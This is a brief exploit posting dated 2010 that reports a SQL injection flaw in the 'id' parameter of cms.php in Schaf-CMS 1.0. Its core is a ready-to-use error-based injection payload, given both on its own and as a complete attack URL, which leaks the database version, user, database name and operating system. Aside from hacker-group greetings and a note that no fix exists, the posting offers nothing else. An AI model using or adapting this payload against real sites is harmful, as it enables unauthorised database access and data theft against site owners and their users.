Schaf-CMS 1.0 (cms.php id) Remote SQL Injection Vulnerability

2010-05-24 10:30:55

Schaf-CMS 1.0 SQL Injection Vulnerability

###########################

Author : Manas58
Homepage : http://www.1923turk.com
Script : Schaf-CMS 1.0
Download : http://www.brothersoft.com/site-builder-software---cms-53489.html

###########################

[ Vulnerable File ]

cms.php?id= [ SQL ]


[ XpL ]

+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+


http://server/cms.php?id=5+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+




##############################################################
# Greetz: Gamoscu - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.